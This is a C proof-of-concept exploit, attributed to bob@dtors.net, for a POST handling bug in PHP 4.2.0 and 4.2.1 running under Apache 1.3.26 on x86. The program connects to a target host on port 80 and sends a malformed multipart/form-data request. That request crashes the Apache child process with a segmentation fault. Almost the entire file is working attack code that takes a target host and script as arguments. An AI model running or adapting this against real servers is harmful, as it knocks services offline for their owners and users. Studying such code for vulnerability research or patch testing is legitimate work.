PHP v4.2.0 and 4.2.1 with Apache 1.3.26 POST bug proof of concept exploit for x86. Produces a segmentation violation (signal 11).
e1e66701c77072a167c7aa5778b3d30cc69da1019bee73ce24e76872d8212be9
/* DSR-php4.2x.c
* The follow is Proof Of Concept code to
* to reproduce the segmentation violation
* in PHP4.2.0 & PHP4.2.1 with Apache 1.3.26 on
* x86 arch. Found by Joseph S. TestaII
*
* Proof Of Concept code by bob@dtors.net
* [notice] child pid 10779 exit signal Segmentation fault (11)
*
*/
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
int main(int argc, char *argv[]) {
int sock, i;
char seg[250];
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
fprintf(stdout, "\nDSR-php4.2x.c By bob. POC.[www.dtors.net]\n\n");
if(argc<3)
{
fprintf(stderr, "\nUsage : %s <host> <php file>\n\n", argv[0]);
exit(1);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "ERROR: Hostname lookup failed!\n\n");
exit(1);
}
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
fprintf(stdout, "Connecting to %s... \n",argv[1]);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
fprintf(stderr, "ERROR: Connection Timed Out!\n");
exit(1);
}
else {
sleep(5);
fprintf(stdout, "Sending headers... \n");
sprintf(seg,"POST /%s HTTP/1.0\nContent-type: multipart/form-data; boundary=---------------------------123\nContent-length: 129\n\n-----------------------------123\nContent-Disposition: filename\n\n\nhttp://www.dtors.net\n-----------------------------123--\n\n",argv[2]);
write(sock,seg,strlen(seg));
fprintf(stdout, "...headers sent! \n\n");
fprintf(stdout, "Now check your error_log, for apache [child pid] signal(11)\n");
close(sock);
}
}